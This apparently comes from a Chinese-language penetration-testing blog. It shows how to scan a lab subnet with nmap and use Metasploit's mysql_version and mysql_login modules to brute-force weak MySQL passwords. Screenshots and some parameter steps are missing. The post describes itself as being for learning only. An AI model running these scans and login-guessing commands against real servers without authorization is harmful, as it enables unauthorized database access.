課前宣告：
1、本分享僅做學習交流，請自覺遵守法律法規！
2、搜尋：Kali 與程式設計，學習更多網路攻防乾貨！
3、Kali 與程式設計每天準時更新，敬請學習和關注！
正文部分
一、背景介紹
Metasploit就是一個漏洞框架。它的全稱叫做The Metasploit Framework，簡稱叫做MSF。Metasploit作為全球最受歡迎的工具，不僅僅是因為它的方便性和強大性，更重要的是它的框架。它允許使用者開發自己的漏洞指令碼，從而進行測試。那麼如何利用Metasploit(msf)進行Mysql弱口令爆破呢？接下來讓我們一起學習！
二、資源裝備
1.安裝好 Kali Linux 的虛擬機器一臺

3.2 檢視受害者主機的IP地址，如下圖所示。
命令：ifconfig

3.3 針對目標受害者主機進行資訊收集，如下圖所示。
命令：nmap -sV IP
例子：nmap -sV 192.168.126.170-200

3.4 掃描結果如下圖所示，目標攻擊者主機開啟了3306危險埠。

3.5 利用Metasploit（msf）滲透框架對目標主機進行資訊收集，如下圖所示。
命令：msfconsole

3.6 利用msf檢索SQL相關攻擊模組，如下圖所示。

3.7 利用檢索到的漏洞利用模組，如下圖所示。
命令：use auxiliary/scanner/mysql/mysql_version

3.8 檢視相關引數，如下圖所示。
命令:show options

3.9 設定引數，如下圖所示。
命令：set rhosts 192.168.126.170-200
命令：set threads 50

3.10 執行攻擊模組，如下圖所示。
命令：run

3.11 返回上層目錄，如下圖所示。
命令：back

3.12 檢索資料庫攻擊模組，如下圖所示。
命令：search mysql_login

3.13 利用檢索到的攻擊模組，如下圖所示。

3.14 檢視相關引數，如下圖所示。
命令：show options

3.15 設定相關引數，如下圖所示。

3.16 設定好引數進行攻擊，如下圖所示。
命令：run

辛苦原創，你的每一次評論點贊和關注，都是我們源源不斷的創作動力哦！你也可搜尋:Kali 與程式設計，學習更多 Kali Linux 滲透與白帽程式設計技巧呢！
點我學習更多Kali Linux滲透測試與網路攻防實戰技巧！